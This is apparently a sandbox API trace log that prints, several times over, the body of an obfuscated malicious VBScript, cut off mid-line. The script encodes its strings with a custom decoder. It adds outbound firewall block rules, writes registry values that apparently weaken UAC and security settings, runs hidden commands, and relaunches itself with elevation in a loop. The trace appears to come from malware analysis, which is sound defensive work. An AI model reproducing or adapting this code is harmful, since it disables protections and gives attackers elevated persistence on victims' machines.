Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.316] wcsncmp (_String1="Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.317] wcsncmp (_String1="unction\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.317] wcsncmp (_String1="nction\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.317] wcsncmp (_String1="ction\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.317] wcsncmp (_String1="tion\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 